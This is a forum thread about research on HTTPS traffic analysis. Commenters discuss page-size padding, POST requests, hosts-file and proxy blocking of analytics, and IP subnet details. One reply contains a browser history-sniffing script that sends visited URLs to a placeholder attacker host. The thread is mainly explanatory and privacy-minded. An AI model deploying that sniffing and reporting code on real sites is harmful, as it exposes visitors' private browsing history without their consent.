
posted by janrinok on Thursday March 06 2014, @11:17AM   Printer-friendly
from the I-can-still-see-you dept.

AnonTechie has discovered two articles that discuss the risks posed by traffic analysis of seemingly-secure HTTPS, although neither attack seems simple to carry out.

From 'Even HTTPS Can Leak Your Private Data': "HTTPS may be good at securing financial transactions, but it isn't much use as a privacy tool: US researchers have found that a traffic analysis of ten HTTPS-secured Web sites yielded 'personal data such as medical conditions, legal or financial affairs or sexual orientation'."

In the 28-page PDF 'I Know Why You Went to the Clinic: Risks and Realization of HTTPS Traffic Analysis', UC Berkeley researchers Brad Miller, AD Joseph and JD Tygar, and Intel Labs' Ling Huang show that even encrypted Web traffic can leave enough breadcrumbs on the trail to be retraced.

  • (Score: 3, Insightful) by Kromagv0 on Thursday March 06 2014, @11:28AM

    by Kromagv0 (1825) on Thursday March 06 2014, @11:28AM (#11985) Homepage

    This shouldn't be a surprise given that it will leak the pages you visited, aka the magic metadata. I have never assumed that the browser cache, browser history, cookies, or redirects were anything but public and no one else really should either.

    --
    T-Shirts and bumper stickers [zazzle.com] to offend someone
    • (Score: 2, Informative) by Anonymous Coward on Thursday March 06 2014, @12:03PM

      by Anonymous Coward on Thursday March 06 2014, @12:03PM (#12008)

      There's a simple way to get sensitive data out of the browser history (it has to be done by the web site author, however): Use POST instead of GET to transmit that data. Then your browser history only shows which page you visited, but not what data you submitted (sometimes even the page URL may contain critical information, but in many cases it is only the specific data you sent which you want to protect; for example with searches, there's no reason to hide that you did a web search, while you may have a reason to hide what you searched for).

      However, be aware that the browser may still save your search terms, e.g. in the input box history.
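
      A rough sketch of that difference in browser-side TypeScript (the /search endpoint and the query are made up for illustration):

        const query = "embarrassing medical condition";

        // GET: the query string lands in the URL, and therefore in the browser history.
        fetch("/search?" + new URLSearchParams({ q: query }).toString());

        // POST: the history only records that /search was visited; the data rides in the request body.
        fetch("/search", {
          method: "POST",
          headers: { "Content-Type": "application/x-www-form-urlencoded" },
          body: new URLSearchParams({ q: query }).toString(),
        });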

      • (Score: 1) by glyph on Thursday March 06 2014, @07:45PM

        by glyph (245) on Thursday March 06 2014, @07:45PM (#12315)

        At least for cross-site requests, NoScript will actually convert GET requests to POST requests browser-side. IIRC this is enabled by default.

    • (Score: 3, Interesting) by ls671 on Thursday March 06 2014, @12:06PM

      by ls671 (891) on Thursday March 06 2014, @12:06PM (#12011) Homepage

      Yes, that's why really secure links send dummy data all the time, to make it harder for an eavesdropper to tell when something real is happening on the link. Just set up a script to send dummy data daily to the "Clinic" site and other sites you might want to use. ;-)
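
      Something like this toy sketch would do it (the site list and schedule are made up; it is cover traffic and nothing more):

        const decoys = ["https://clinic.example", "https://lawyer.example", "https://bank.example"];

        // Fetch one random decoy site per day so an eavesdropper can't tell a real visit from noise.
        setInterval(() => {
          const url = decoys[Math.floor(Math.random() * decoys.length)];
          fetch(url).catch(() => { /* failures don't matter; this is only noise */ });
        }, 24 * 60 * 60 * 1000);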

      --
      Everything I write is lies, including this sentence.
    • (Score: 0, Redundant) by robodog on Thursday March 06 2014, @03:49PM

      by robodog (1365) on Thursday March 06 2014, @03:49PM (#12154)

      https leaks the pages that I visit? How so?

      • (Score: 1) by bryan on Thursday March 06 2014, @07:20PM

        by bryan (29) <bryan@pipedot.org> on Thursday March 06 2014, @07:20PM (#12295) Homepage Journal

        A website owner can create a page with 1000 links to common Internet sites. JavaScript on this page can then loop through the links, checking each link's style to see whether the URI has been visited (whether the link renders blue or purple), and then report its findings back to the server.
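
        A minimal sketch of that classic :visited sniff (the probe list and reporting endpoint are invented; note that modern browsers deliberately lie to getComputedStyle about :visited colors precisely to block this, so treat it as historical):

          const probes = ["https://example-bank.com/", "https://example-clinic.org/"]; // the "1000 links"
          const visited: string[] = [];

          for (const url of probes) {
            const a = document.createElement("a");
            a.href = url;
            document.body.appendChild(a);
            // Unvisited links default to blue (rgb(0, 0, 238)); any other color implied "visited".
            if (getComputedStyle(a).color !== "rgb(0, 0, 238)") {
              visited.push(url);
            }
            a.remove();
          }

          // Phone the findings home to a hypothetical collection endpoint.
          fetch("https://attacker.example/report", { method: "POST", body: JSON.stringify(visited) });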

  • (Score: 5, Informative) by martyb on Thursday March 06 2014, @11:47AM

    by martyb (76) on Thursday March 06 2014, @11:47AM (#11996) Journal

    If they can do this with https-secured links, just think of what can be done with traffic analysis of unsecured links.

    Not to single them out for any particular reason but only for the sake of example, I offer you just a short sampling of some of Google's offerings:

    1. DNS service at 8.8.8.8; I'm sure every DNS lookup is recorded and analyzed.
    2. jquery caching; every page you load that references a google-hosted copy potentially gives google info on where you go. (Yes, one can reduce this with add-ons that block referer info, but how many people do that?)
    3. Search, of course, which informs them of your areas of interest.
    4. gmail, where they not only get to sift your e-mail's *contents*, but gather a list of *who* you communicate with.

    Some may think this borders on paranoia. Maybe. Then again, I can do some pretty interesting textual analyses, and I'm basically a newbie when it comes to this. They have much better tools at their disposal, both hardware and software.

    Similar things could be said about facebook, yahoo, apple, and microsoft.

    Some steps I have taken include a hosts file as well as firefox addons such as: adblock plus, do not track me, noscript, ghostery, self-destructing cookies, and better privacy.

    I commend the SoylentNews developers for their efforts to self-host any resources used and so limit some of the information that is divulged by my visiting this site.

    • (Score: 2, Insightful) by marcello_dl on Thursday March 06 2014, @02:07PM

      by marcello_dl (2685) on Thursday March 06 2014, @02:07PM (#12087)

      There is also google analytics, which sits on third-party sites and is obviously able to log who visits them, because that's the whole point. Try browsing with noscript and see how many times the google analytics site is blocked.

      Then there are the sites that use google webfonts, which are loaded by the client. Or javascript libraries hosted by google, as noscript shows.

      And the google acquisition of recaptcha, which means that recaptcha challenges also come from google servers and can be trivially mined.

  • (Score: 4, Interesting) by Angry Jesus on Thursday March 06 2014, @12:03PM

    by Angry Jesus (182) on Thursday March 06 2014, @12:03PM (#12009)

    It looks like what they are doing is building a list of the sizes of each web page and the links between the pages. They use that to make educated guesses (they got 90% accuracy) as to which pages a specific IP address visits.

    The fix on the server side is to add random amounts of padding to each web page (or if they can manage it, pad them to all have the same size).
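
    A rough sketch of the random-padding idea, assuming a plain Node HTTP server (the page content, pad sizes and port are made up; random hex is used so gzip can't squeeze the padding back down to a constant size):

      import { createServer } from "node:http";
      import { randomBytes, randomInt } from "node:crypto";

      const PAGE = "<html><body><h1>Clinic info</h1></body></html>";

      createServer((req, res) => {
        // A different random amount of padding on every response, hidden in an HTML comment.
        const padLen = randomInt(0, 4096);
        const body = PAGE + "<!-- " + randomBytes(padLen).toString("hex") + " -->";
        res.writeHead(200, {
          "Content-Type": "text/html",
          "Content-Length": Buffer.byteLength(body),
        });
        res.end(body);
      }).listen(8080);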

    • (Score: 2, Interesting) by tempest on Thursday March 06 2014, @02:00PM

      by tempest (3050) on Thursday March 06 2014, @02:00PM (#12084)

      Padding seems like it could work, but I think padding them to be the same size would be a mess with HTTP compression. Assuming pages on a website generally run in a range of sizes, if you pad them randomly between those sizes with incompressible data it might be enough. I'm not sure that's realistic for graphics in real time though. Since this requires statistics on those elements, perhaps having a source image which is periodically recompressed to random sizes could obscure their data collection until they re-poll the entire site.

      • (Score: 2) by Angry Jesus on Thursday March 06 2014, @02:26PM

        by Angry Jesus (182) on Thursday March 06 2014, @02:26PM (#12096)

        I think it would be simpler than that. If the encrypted data contains a content-length field (iirc that's recommended, but not mandatory, for http) then just append pre-compressed garbage to the end, xor it with a new random key each time and you're golden.

        • (Score: 1) by tempest on Thursday March 06 2014, @03:27PM

          by tempest (3050) on Thursday March 06 2014, @03:27PM (#12144)

          Since it's more a matter of size than what's appended, I don't think the random xor is needed. That seems pretty doable server side though with a simple module. Just generating a big pile of shit in ram and taking random pieces of it would be pretty low overhead (aside from bandwidth and extra ram).

      • (Score: 1) by tempest on Thursday March 06 2014, @02:31PM

        by tempest (3050) on Thursday March 06 2014, @02:31PM (#12102)

        Replying to myself and thinking out loud here: this statistical analysis occurred to me a few months ago when messing around on my own site (which is mostly static), wondering how someone could infer which page a visitor was viewing by studying the size of the download. Padding the actual pages didn't occur to me, so I guess you could say I'm very interested in this topic :) One thing that came to mind is that one section of my site has essentially randomized banners. There's only 30 of them, but the same pages show different banners every week and rotate between them. Taking this a step further, if you had a collection of, say, 5000 random-sized images and referenced them on the page (using style="display:none" or something), then with HTTP pipelining the glob transfer would be hard to scrutinize. Does this sound doable?

  • (Score: 5, Insightful) by MichaelDavidCrawford on Thursday March 06 2014, @12:15PM

    by MichaelDavidCrawford (2339) on Thursday March 06 2014, @12:15PM (#12019) Homepage

    There are a lot of folks who regard the nsa metadata collection as ineffective. I don't.

    Traffic analysis was explained as follows by a consultant to the military at the Network and Computer Security tutorial I attended during the 1989 Interop Conference:

    "You don't need to decrypt anything. Just look for the tent that's sending and receiving a lot of messages. That must be the command post, eh wot? Let's see what happens if we drop a bomb on it."

    Quite commonly drug dealers and brothels are busted by observing lots of people coming and going to a place that one would not expect to get a lot of visitors.

    I am dead certain that the NSA collects most of its metadata, not through wiretapping, but through perfectly legal web and mobile analytics, say by offering free emoticons, web fonts and the like.

    This is easiest with an older rev of Safari, as 35 and 43 pixel gifs, as well as 0 and 1 byte javascripts, show up quite obviously in its Activity window. Now, some one-pixel gifs are still used as spacers; you don't need to blackhole those. Look for servers with suspicious names like "hosted-pixel.com", or for huge long lists of query parameters in the web bug's URL.

    Drop this into your hosts file:

    0.0.0.0 hosted-pixel.com
    0.0.0.0 google-analytics.com
    0.0.0.0 www.google-analytics.com
    0.0.0.0 ssl.google-analytics.com

    In general, be suspicious of any URL that is served from a host other than the one serving the page you are looking at.

    Analytics also breaks HTTP 1.1's chunked encoding; it causes your client and the server to set up and tear down vast numbers of TCP connections; it creates more routes on the internet backbone than would otherwise be the case; and it uses prodigious quantities of electrical power, contributing not only to global warming but also to the release of radon gas into the atmosphere, mercury into the oceans from burning coal, and so on.

    Please someone reply with the location of the windows hosts file. It's not in the same place in every version of windows.

    Far worse is mobile analytics. The analytics services can tell where you tap on your screen whenever you run an app that has their free analytics SDK. I attended a talk on mobile analytics at a Mobile Portland meeting. One of the speakers showed a photo of her company's data center - it was as big as Google's. Do you really want to be watched by an analytics service when you're browsing pr0n in the gent's room at work?

    --
    I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
    • (Score: 2, Funny) by Anonymous Coward on Thursday March 06 2014, @01:02PM

      by Anonymous Coward on Thursday March 06 2014, @01:02PM (#12050)

      "You don't need to decrypt anything. Just look for the tent that's sending and receiving a lot of messages. That must be the command post, eh wot? Let's see what happens if we drop a bomb on it."

      A message from the enemy: "Thank you for taking out the mole. We had long been searching for him without success."

    • (Score: 0) by Anonymous Coward on Thursday March 06 2014, @01:02PM

      by Anonymous Coward on Thursday March 06 2014, @01:02PM (#12053)
      Windows XP: C:\WINDOWS\system32\drivers\etc\hosts

      Sorry, that's the only Windows box I have right now.

      Also, inb4 apk :)
    • (Score: 2, Informative) by Zinho on Thursday March 06 2014, @01:57PM

      by Zinho (759) on Thursday March 06 2014, @01:57PM (#12082)

      I'm going to apologize in advance because my response here may seem overly-harsh. You said:

      Drop this into your hosts file: <snip> Please someone reply with the location of the windows hosts file. It's not in the same place in every version of windows.

      I'm not honestly sure if you're sincere or trolling. That other news site had a dedicated single-topic troll for this, and the issue got flamed over repeatedly; my general impression was that even on boxes you control pretty well the hosts file is a bad tool for host blocking. This is especially true if you're going to use a long list of hosts, less so with shorter ones (so your suggestion may not be that bad if you don't take it further). There were reports of many different problems on Windows with the Hosts file, not the least of which was that the system would simply ignore it. In fact, "hosts file" was the top autocomplete option in Google when I typed in "windows ignores ".

      I may also have to take issue with your choice of dummy IP address. My understanding is that the 0.0.0.0/8 block is for broadcast messages to the local net. I'm not sure what exactly happens when you issue a GET request from your browser to an IP address in that range, but there's a chance that it will behave oddly; in theory, the request will get sent to every host on your subnet. If any networking geeks want to fill in that gap in my knowledge please do so. It's probably better to use your own loopback address, 127.0.0.1 (actually, anything in the 127.0.0.0/8 should work the same).

      That all being said, there's merit to the simplicity of your advice. A DNS service running on localhost is more effective, but more complex to operate (and may bother your network admin if you misconfigure it). On Linux it's possible to configure IPTables to do the same job, and there are block lists published for that specific purpose [yoyo.org]; more robust than the hosts file, but still requires some arcane knowledge. An HTTP proxy is probably a better solution for a workstation/home computer (Squid [squid-cache.org] is a good choice - it's cross-platform, and GPL), but will still take some configuration. If you're willing to go whole hog with host blocking, though, the extra time to do it right is probably worth it to you.

      • (Score: 3, Informative) by etherscythe on Thursday March 06 2014, @02:16PM

        by etherscythe (937) on Thursday March 06 2014, @02:16PM (#12088)

        Correct; in particular, Windows 8 is known to remove entries for certain common domains from the hosts file. Additionally, IP addresses are IIRC the multicast address when they end in .0. All 0's may be multicast to all available networks; my knowledge is a little fuzzy on that edge of things.

        On the other hand, for what it's worth, Spybot Search & Destroy used the hosts file for its "inoculation" feature. For basic usage it seems to work well, but I rarely have more than a dozen entries in there (I prefer to blacklist in NoScript/NotScripts).

        • (Score: 1) by isostatic on Thursday March 06 2014, @04:08PM

          by isostatic (365) on Thursday March 06 2014, @04:08PM (#12169)

          Additionally, IP addresses are IIRC the multicast address when they end in .0. All 0's may be multicast to all available networks; my knowledge is a little fuzzy on that edge of things.

          No, Multicast addresses are class D addresses, 224.0.0.0 to 239.255.255.255 inclusive.

          Broadcast addresses are the top of the subnet, as well as 255.255.255.255 (which is special). Network addresses are the bottom of the subnet. If I had a host "8.8.8.8" with a net mask of "255.0.0.0", my network address is 8.0.0.0, my broadcast address is 8.255.255.255, my allowed host addresses run from 8.0.0.1 to 8.255.255.254.

          That means that 8.8.0.0 would be a valid host address. Most people would assume that something ending in .0 would be a network address, which it is, unless you have a subnet with more than 256 addresses (so a /23 or shorter prefix).
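
          (To spell the arithmetic out, here is a small TypeScript sketch of my own; the addresses are just the examples above.)

            // Convert dotted-quad to a 32-bit unsigned integer and back.
            function toInt(ip: string): number {
              return ip.split(".").reduce((acc, oct) => (acc << 8) + parseInt(oct, 10), 0) >>> 0;
            }
            function toIp(n: number): string {
              return [24, 16, 8, 0].map(shift => (n >>> shift) & 0xff).join(".");
            }

            // Network = address AND mask; broadcast = network OR inverted mask.
            function subnetInfo(ip: string, prefix: number) {
              const mask = prefix === 0 ? 0 : (0xffffffff << (32 - prefix)) >>> 0;
              const network = (toInt(ip) & mask) >>> 0;
              const broadcast = (network | (~mask >>> 0)) >>> 0;
              return { network: toIp(network), broadcast: toIp(broadcast) };
            }

            console.log(subnetInfo("8.8.8.8", 8)); // { network: "8.0.0.0", broadcast: "8.255.255.255" }
            console.log(subnetInfo("8.8.0.0", 8)); // 8.8.0.0 falls between those, so it's a valid host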

          Now I've rarely seen the need for a real subnet larger than a /24, but if you're working on private ranges like 10.0.0.0/8, you could have subnets coming out of your ears.

          The only thing I could think of would be if you had a large wireless network, with hundreds or thousands of clients, and wanted them to be able to roam anywhere. None of my networks approach that size, I haven't got a DHCP range more than 50, and I suspect that there are better ways of managing networks that size rather than dropping your APs on the same subnet.

          It's a fair bet that on the internet you won't see a host address ending in .0

          (Naturally this is all IPv4, none of that ipv6 voodoo)

          Any network experts able to tell me what is supposed to happen if I send a packet to a network address? So I'm on 1.1.1.1/24, I send a packet to 1.1.1.255 and it goes to all hosts on the subnet. If I send it to 1.1.1.0, what happens?

          • (Score: 1) by MichaelDavidCrawford on Thursday March 06 2014, @06:31PM

            by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:31PM (#12263) Homepage

            I attended the 1989 Interop Network and Computer Security Tutorial. One of the other students asked our instructors whether he could do anything about the fact that UNIX user IDs were only sixteen bits. The instructors replied that nothing could be done.

            "May I ask who you work for?"

            "Motorola."

            Now that was 1989. Here in 2013, I _think_ linux has 32-bit UIDs.

            Apple, Inc. has something like 90,000 employees, probably twice as many temps and contract programmers.

            Now you really don't need them all on the same subnet, but there are some advantages to doing so.

            --
            I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
      • (Score: 2) by Foobar Bazbot on Thursday March 06 2014, @02:34PM

        by Foobar Bazbot (37) on Thursday March 06 2014, @02:34PM (#12105)

        Note that he (and APK) recommended 0.0.0.0, which as the lowest address in the block should be the network address rather than a valid host address, so I agree there's a chance it will behave oddly, but I don't think your "in theory" is correct. (But I'm no IP guru, could be wrong here. I didn't even know what 0.0.0.0/8 was till you mentioned it.)

        Anyway, APK's not entirely wrong -- which is, of course, pretty much key to being a successful troll. While it's an inelegant method, it does work pretty well; as long as all you want done is per-host blocking (rather than regex blocking, typo correction, page mangling, etc.), there's really no benefit there to justify switching from an existing hosts-file setup to anything else. Additionally, it has particular benefit for systems which periodically grab an axe and run around playing Lizzy Borden with your processes (yes, I'm speaking of Android), as it doesn't involve a running process and thus is immune to hiccups from that.

      • (Score: 1) by isostatic on Thursday March 06 2014, @03:11PM

        by isostatic (365) on Thursday March 06 2014, @03:11PM (#12133)

        If you're willing to go whole hog with host blocking, though, the extra time to do it right is probably worth it to you.

        No, it's not. I have a dozen or so entries in my hosts file, for times when DNS isn't available, for autocomplete on ping and ssh, etc.

        I also have a dozen or so domain names that have annoyed me by being slow to load (Doubleclick, for example); those all get directed to 127.0.0.1.

        There were reports of many different problems on Windows with the Hosts file, not the least of which was that the system would simply ignore it.

        And why would this interest the typical SN reader?

        • (Score: 0) by MichaelDavidCrawford on Thursday March 06 2014, @06:35PM

          by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:35PM (#12266) Homepage

          ... I finally found someone who actually knew who Edward Snowden was. That's why he only wants cash when reloading my phone.

          So I turned him on to hosts file blocking of Analytics.

          The manager at the cafe I'm hanging at, she's a long way from editing her hosts file, so I just turned her onto Windows 7: the Missing Manual. I'll find some way to ensure she has a clueful friend, then have her hand-deliver a note about blackholing analytics servers to that friend.

          While you run linux or bsd or solaris or openVMS, I expect your aged grandmother runs windows. You would do her a service to help her protect her privacy.

          --
          I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
      • (Score: 1) by MichaelDavidCrawford on Thursday March 06 2014, @06:23PM

        by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:23PM (#12254) Homepage

        No, I'm not trolling. I'm getting ready to do a KickStarter campaign to fund newspaper and radio ads advising voters in the upcoming US midterm elections to defeat both web and mobile analytics. This is because the Associated Press recently reported that widespread use of individually-targeted political ads on television is expected, as a result of TVs, DVRs and so on reporting their own analytics back to your cable provider.

        That is, if comcast knows that you watch Fox News all day long, you'll be getting lots of requests to donate to the Republican Party and its candidates.

        I'd rather chew my own foot off than watch Fox News, but if I did watch Fox News, I'd just see the usual ads for consumer products.

        What that AP report did not clue into is that most Americans get their Internet from their Cable TV provider. So Comcast, Time Warner and friends all know what sites you hang out on. Even if you don't have the kind of DVR or TV that phones home, your web browser does.

        That's also why, as you pointed out, one does well either to operate one's own nameserver or to use that of a technically-inclined friend.

        A year or so ago I configured the DNS for my Mom's iMac to use Level 3's "opt out" nameservers: 4.2.2.1, 4.2.2.2, 4.2.2.3 and 4.2.2.4. That worked great, as her default EarthLink nameservers, configured via DHCP, "provided" broken DNS that presented a web search page whenever a name lookup failed.

        GET THIS:

        Starting just this last Sunday, those "opt out" nameservers from Level 3, now provide broken DNS and a search page. I am totally flummoxed that a respectable outfit like Level 3 Communications would stoop so low. I expect EarthLink got wind that lots of its users had opted out, maybe threatened to go with another provider.

        I haven't looked into it yet, but I expect that only happens when one uses 4.2.2.x when one is an EarthLink customer. I expect they don't do the broken DNS if one comes from some other ISP.

        I apologize; I should have known better than to recommend 0.0.0.0 to absolutely everyone. I used to do SQA for Apple's MacTCP: I wrote a whole new test tool in C++ and a hundred-page test plan, and I used to go over packet dumps with a highlighter and the RFCs to ensure that our IP-in-AppleTalk encapsulation was correct, as our sniffer couldn't decode it.

        But that was over twenty years ago.

        The reason I don't use 127.0.0.1 is that it chokes the logs on my Mac.

        I had tried 127.0.0.2, expecting an immediate RST, but what I got were long waits followed by a timeout.

        A long hosts file is not a problem on a modern Mac. I expect it would not be on *NIX but I can see how it would be on Windows.

        Really, what would be a lot better for everyone would be a patch to the library that implements gethostbyname and friends.

        Another aim of my KickStarter campaign, I don't want my aged mother trying to edit her hosts file with sudo, so I'm going to write some code to make this a lot easier.

        To blackhole mobile analytics, one must jailbreak one's device. For iOS, I could put a free App in the Cydia App Store. For Android, I expect the CyanogenMod folks would be down with including it.

        --
        I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
        • (Score: 0) by Anonymous Coward on Friday March 07 2014, @12:13PM

          by Anonymous Coward on Friday March 07 2014, @12:13PM (#12751)

          I used to do the same things as you. I gave up and got the 99% solution. I use adblock and noscript.

          However, if you want to continue to use hosts files, I suggest something different: your own DNS server, and your own http server. I ran straight into the same issue you did - 0.0.0.0 is not 'right' and 127.0.0.1 is slow to time out. So what I did was pick the sites I wanted to blackhole and have the DNS server just return an address that serves up a 1x1 gif. Then inside of a squid server I would look for http urls that fit patterns.
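
          (If it helps, here is a rough sketch of that 1x1-gif "blackhole" responder as a plain Node/TypeScript server; the port and bind address are assumptions.)

            import { createServer } from "node:http";

            // A commonly used transparent 1x1 GIF, base64-encoded.
            const PIXEL = Buffer.from("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", "base64");

            // Answer every request with the pixel so blocked trackers resolve to something
            // harmless instead of leaving the page hanging until a timeout.
            createServer((req, res) => {
              res.writeHead(200, { "Content-Type": "image/gif", "Content-Length": PIXEL.length });
              res.end(PIXEL);
            }).listen(8080, "127.0.0.1"); // point the blackholed DNS names at this address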

          The nice part of having your own DNS server is you can change who your upstream is fairly easily. There are about 20-30 you can choose from. Stay away from the root level domains as they tend to be slow.

          This all, however, has drawbacks too, as some sites expect to get javascript back, and it ends up borking some browsers in about the same way noscript does.

          Also those 4 you have? That is a woefully short list. There are *thousands* of analytic companies out there. All of the ad networks run similar services too.

          I honestly got tired of chasing it so went to a much simpler solution of adblock. However, the drawback to this is I now depend on the mercy of others to get the 'blacklist' right.

          I am borderline to the point of just going 'whitelist'. But even that is a pain.

          I used to use this one
          http://winhelp2002.mvps.org/hosts.htm [mvps.org]
          and another one whose name escapes me now.

          I would use those as the base for what I was trying to do.

          The massive problem with hosts files is that they are trivial for the end site to work around.

          Let's say you serve up tracking cookies from cookie.somesite.com.

          You figure out people are blocking cookie.somesite.com, so you just change cookie to ab83s83.somesite.com, and change ab83s83 to xyz123 for the next visit. So you end up filling your hosts file with tons of hostnames that will never even exist again. Just adding 0.0.0.0 somesite.com to the hosts file does not work either; hosts file lookup does not do wildcards, so xyz123.somesite.com will still resolve.
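
          (A toy illustration of that exact-match limitation, versus the suffix matching a proxy or a real DNS filter can do; the hostnames are the made-up ones above.)

            const hostsFileEntries = new Set(["cookie.somesite.com"]); // hosts files match exact names only
            const suffixBlocklist = ["somesite.com"];                  // a proxy/DNS filter can block whole domains

            const blockedByHosts = (host: string): boolean => hostsFileEntries.has(host);
            const blockedBySuffix = (host: string): boolean =>
              suffixBlocklist.some(d => host === d || host.endsWith("." + d));

            console.log(blockedByHosts("ab83s83.somesite.com"));  // false: slips straight through
            console.log(blockedBySuffix("ab83s83.somesite.com")); // true: caught by the domain rule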

          Good luck with whatever you come up with though. I personally got tired of chasing the dragon :(

    • (Score: 4, Insightful) by davester666 on Thursday March 06 2014, @02:38PM

      by davester666 (155) on Thursday March 06 2014, @02:38PM (#12107)

      > There are a lot of folks who regard the nsa metadata collection as ineffective. I don't.

      No, that's not correct. Lots of people regard the nsa metadata collection as ineffective at finding terrorists. It is quite effective at finding other criminal behaviour, which the NSA was secretly/now openly passing to the FBI.

      • (Score: 1) by MichaelDavidCrawford on Thursday March 06 2014, @06:27PM

        by MichaelDavidCrawford (2339) on Thursday March 06 2014, @06:27PM (#12258) Homepage

        Not because of the fourth amendment.

        I'm tired so I can't deal with looking it up just now, but my understanding is that the US Military is specifically forbidden from performing strictly civilian law enforcement. I understand that's why we have a separate US Coast Guard, as well as why the Coast Guard is a branch of Homeland Security rather than DoD.

        --
        I have a major product announcement [warplife.com] coming 5:01 PM 2014-03-21 EST.
        • (Score: 2) by davester666 on Thursday March 06 2014, @11:02PM

          by davester666 (155) on Thursday March 06 2014, @11:02PM (#12439)

          Oh no, it's totally illegal. The NSA and FBI know it too, because there were explicit instructions with the information, namely, don't tell anybody where you got it, and claim you started the investigation based on other information you uncover during the investigation.

          A FISA judge found out about part of it, and evidently all he can do is write the NSA a strongly worded letter saying to stop doing it. Yeah, sure they will if that's the only punishment they get...